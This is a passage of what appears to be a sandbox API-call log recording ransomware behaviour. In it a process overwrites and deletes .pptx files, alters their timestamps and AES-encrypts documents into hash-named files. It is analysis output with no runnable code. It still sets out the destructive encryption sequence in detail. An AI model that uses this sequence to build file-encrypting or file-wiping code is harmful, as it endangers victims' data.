halpmcxz\\documents\\80ed363b1af7221527be954d7e003980.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.963] GetFileType (hFile=0x36c) returned 0x1 [0075.963] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0075.963] GetFileType (hFile=0x36c) returned 0x1 [0075.963] WriteFile (in: hFile=0x36c, lpBuffer=0x216f4a0*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x216f4a0*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0075.964] CloseHandle (hObject=0x36c) returned 1 [0075.965] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx", lpFilePart=0x0) returned 0x36 [0075.965] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0075.965] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vgynkjmm0.pptx"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5587560, ftCreationTime.dwHighDateTime=0x1d4c7d6, ftLastAccessTime.dwLowDateTime=0x9b01d350, ftLastAccessTime.dwHighDateTime=0x1d4fa9b, ftLastWriteTime.dwLowDateTime=0x9b01d350, ftLastWriteTime.dwHighDateTime=0x1d4fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x1ab3)) returned 1 [0075.965] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0075.965] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx", lpFilePart=0x0) returned 0x36 [0075.965] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx", dwFileAttributes=0x80) returned 1 [0075.965] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx", lpFilePart=0x0) returned 0x36 [0075.965] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0075.966] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vgynkjmm0.pptx"), fInfoLevelId=0x0, lpFileInformation=0x2177088 | out: lpFileInformation=0x2177088*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd5587560, ftCreationTime.dwHighDateTime=0x1d4c7d6, ftLastAccessTime.dwLowDateTime=0x9b01d350, ftLastAccessTime.dwHighDateTime=0x1d4fa9b, ftLastWriteTime.dwLowDateTime=0x9b01d350, ftLastWriteTime.dwHighDateTime=0x1d4fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x1ab3)) returned 1 [0075.966] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0075.966] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx", lpFilePart=0x0) returned 0x36 [0075.966] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0075.966] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vgynkjmm0.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.966] GetFileType (hFile=0x36c) returned 0x1 [0075.966] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0075.966] GetFileType (hFile=0x36c) returned 0x1 [0075.966] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.967] WriteFile (in: hFile=0x36c, lpBuffer=0x2177510*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2177510*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.967] WriteFile (in: hFile=0x36c, lpBuffer=0x2177510*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x2177510*, lpNumberOfBytesWritten=0x1bf5daa8*=0xc00, lpOverlapped=0x0) returned 1 [0075.967] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.968] WriteFile (in: hFile=0x36c, lpBuffer=0x2177510*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2177510*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.969] WriteFile (in: hFile=0x36c, lpBuffer=0x2177510*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x2177510*, lpNumberOfBytesWritten=0x1bf5daa8*=0xc00, lpOverlapped=0x0) returned 1 [0075.969] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.970] WriteFile (in: hFile=0x36c, lpBuffer=0x2177510*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2177510*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.970] WriteFile (in: hFile=0x36c, lpBuffer=0x2177510*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x2177510*, lpNumberOfBytesWritten=0x1bf5daa8*=0xc00, lpOverlapped=0x0) returned 1 [0075.970] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.971] WriteFile (in: hFile=0x36c, lpBuffer=0x2177510*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2177510*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.972] WriteFile (in: hFile=0x36c, lpBuffer=0x2177510*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x2177510*, lpNumberOfBytesWritten=0x1bf5daa8*=0xc00, lpOverlapped=0x0) returned 1 [0075.972] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0075.972] SetEndOfFile (hFile=0x36c) returned 1 [0075.973] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0075.973] CloseHandle (hObject=0x36c) returned 1 [0075.973] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx", lpFilePart=0x0) returned 0x36 [0075.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.973] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vgynkjmm0.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.973] GetFileType (hFile=0x36c) returned 0x1 [0075.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.973] GetFileType (hFile=0x36c) returned 0x1 [0075.973] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0075.973] CloseHandle (hObject=0x36c) returned 1 [0075.973] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx", lpFilePart=0x0) returned 0x36 [0075.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.974] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vgynkjmm0.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.974] GetFileType (hFile=0x36c) returned 0x1 [0075.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.974] GetFileType (hFile=0x36c) returned 0x1 [0075.974] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0075.974] CloseHandle (hObject=0x36c) returned 1 [0075.974] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx", lpFilePart=0x0) returned 0x36 [0075.974] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.974] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vgynkjmm0.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.974] GetFileType (hFile=0x36c) returned 0x1 [0075.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.974] GetFileType (hFile=0x36c) returned 0x1 [0075.974] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0075.974] CloseHandle (hObject=0x36c) returned 1 [0075.974] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx", lpFilePart=0x0) returned 0x36 [0075.974] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vgynkjmm0.pptx")) returned 1 [0075.975] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx", lpFilePart=0x0) returned 0x36 [0075.976] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\80ED363B1AF7221527BE954D7E003980", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\80ED363B1AF7221527BE954D7E003980", lpFilePart=0x0) returned 0x48 [0075.976] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.976] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\80ED363B1AF7221527BE954D7E003980" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\80ed363b1af7221527be954d7e003980"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.976] GetFileType (hFile=0x36c) returned 0x1 [0075.976] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.976] GetFileType (hFile=0x36c) returned 0x1 [0075.976] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0075.976] CloseHandle (hObject=0x36c) returned 1 [0075.976] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\80ED363B1AF7221527BE954D7E003980", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\80ED363B1AF7221527BE954D7E003980", lpFilePart=0x0) returned 0x48 [0075.976] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.976] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\80ED363B1AF7221527BE954D7E003980" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\80ed363b1af7221527be954d7e003980"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.976] GetFileType (hFile=0x36c) returned 0x1 [0075.976] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.976] GetFileType (hFile=0x36c) returned 0x1 [0075.976] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0075.977] CloseHandle (hObject=0x36c) returned 1 [0075.977] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\80ED363B1AF7221527BE954D7E003980", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\80ED363B1AF7221527BE954D7E003980", lpFilePart=0x0) returned 0x48 [0075.977] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.977] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\80ED363B1AF7221527BE954D7E003980" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\80ed363b1af7221527be954d7e003980"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.977] GetFileType (hFile=0x36c) returned 0x1 [0075.977] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.977] GetFileType (hFile=0x36c) returned 0x1 [0075.977] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0075.977] CloseHandle (hObject=0x36c) returned 1 [0075.977] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx", lpFilePart=0x0) returned 0x3b [0075.978] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx", lpFilePart=0x0) returned 0x3b [0075.979] CryptAcquireContextW (in: phProv=0x1bf5da68, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1bf5da68*=0x1a5b7e10) returned 1 [0075.979] CryptImportKey (in: hProv=0x1a5b7e10, pbData=0x217a898, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x1a6269f0) returned 1 [0075.979] CryptContextAddRef (hProv=0x1a5b7e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.979] CryptExportKey (in: hKey=0x1a6269f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0075.979] CryptExportKey (in: hKey=0x1a6269f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x217a988, pdwDataLen=0x1bf5db30 | out: pbData=0x217a988*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0075.979] CryptImportKey (in: hProv=0x1a5b7e10, pbData=0x217aaa8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626e50) returned 1 [0075.979] CryptContextAddRef (hProv=0x1a5b7e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.979] CryptContextAddRef (hProv=0x1a5b7e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.979] CryptDuplicateKey (in: hKey=0x1a626e50, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a626fa0) returned 1 [0075.980] CryptContextAddRef (hProv=0x1a5b7e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.980] CryptSetKeyParam (hKey=0x1a626fa0, dwParam=0x4, pbData=0x217abf0*=0x1, dwFlags=0x0) returned 1 [0075.980] CryptSetKeyParam (hKey=0x1a626fa0, dwParam=0x1, pbData=0x217aba0, dwFlags=0x0) returned 1 [0075.980] CryptDestroyKey (hKey=0x1a626e50) returned 1 [0075.980] CryptReleaseContext (hProv=0x1a5b7e10, dwFlags=0x0) returned 1 [0075.980] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx", lpFilePart=0x0) returned 0x3b [0075.980] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0075.980] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wdgdbpnhl6horo.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.980] GetFileType (hFile=0x36c) returned 0x1 [0075.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0075.980] GetFileType (hFile=0x36c) returned 0x1 [0075.980] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\E459352E54568E51187DDC904D9BBE50", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\E459352E54568E51187DDC904D9BBE50", lpFilePart=0x0) returned 0x48 [0075.980] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0075.980] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\E459352E54568E51187DDC904D9BBE50" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e459352e54568e51187ddc904d9bbe50"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x358 [0075.980] GetFileType (hFile=0x358) returned 0x1 [0075.981] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0075.981] GetFileType (hFile=0x358) returned 0x1 [0075.981] ReadFile (in: hFile=0x36c, lpBuffer=0x217afb0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x217afb0*, lpNumberOfBytesRead=0x1bf5da28*=0xfdb8, lpOverlapped=0x0) returned 1 [0075.982] CryptEncrypt (in: hKey=0x1a626fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x218efc8*, pdwDataLen=0x1bf5da80*=0xfdb0, dwBufLen=0xfdb0 | out: pbData=0x218efc8*, pdwDataLen=0x1bf5da80*=0xfdb0) returned 1 [0075.982] WriteFile (in: hFile=0x358, lpBuffer=0x218efc8*, nNumberOfBytesToWrite=0xfdb0, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x218efc8*, lpNumberOfBytesWritten=0x1bf5da18*=0xfdb0, lpOverlapped=0x0) returned 1 [0075.984] ReadFile (in: hFile=0x36c, lpBuffer=0x217afb0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x217afb0*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0075.984] CryptEncrypt (in: hKey=0x1a626fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x219edb8*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x219edb8*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0075.984] CryptEncrypt (in: hKey=0x1a626fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x219ee08*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x219ee08*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0075.984] WriteFile (in: hFile=0x358, lpBuffer=0x219ee58*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x219ee58*, lpNumberOfBytesWritten=0x1bf5d948*=0x10, lpOverlapped=0x0) returned 1 [0075.984] CloseHandle (hObject=0x358) returned 1 [0075.985] CloseHandle (hObject=0x36c) returned 1 [0075.985] CryptDestroyKey (hKey=0x1a6269f0) returned 1 [0075.985] CryptReleaseContext (hProv=0x1a5b7e10, dwFlags=0x0) returned 1 [0075.985] CryptReleaseContext (hProv=0x1a5b7e10, dwFlags=0x0) returned 1 [0075.985] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\E459352E54568E51187DDC904D9BBE50", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\E459352E54568E51187DDC904D9BBE50", lpFilePart=0x0) returned 0x48 [0075.986] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0075.986] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\E459352E54568E51187DDC904D9BBE50" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e459352e54568e51187ddc904d9bbe50"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.986] GetFileType (hFile=0x36c) returned 0x1 [0075.986] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0075.986] GetFileType (hFile=0x36c) returned 0x1 [0075.986] ReadFile (in: hFile=0x36c, lpBuffer=0x21a0550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a0550*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.987] ReadFile (in: hFile=0x36c, lpBuffer=0x21a0550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a0550*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.988] ReadFile (in: hFile=0x36c, lpBuffer=0x21a0550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a0550*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.989] ReadFile (in: hFile=0x36c, lpBuffer=0x21a0550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a0550*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.990] ReadFile (in: hFile=0x36c, lpBuffer=0x21a0550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a0550*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.990] ReadFile (in: hFile=0x36c, lpBuffer=0x21a0550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a0550*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.990] ReadFile (in: hFile=0x36c, lpBuffer=0x21a0550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a0550*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.991] ReadFile (in: hFile=0x36c, lpBuffer=0x21a0550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a0550*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.991] ReadFile (in: hFile=0x36c, lpBuffer=0x21a0550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a0550*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.991] ReadFile (in: hFile=0x36c, lpBuffer=0x21a0550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a0550*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.991] ReadFile 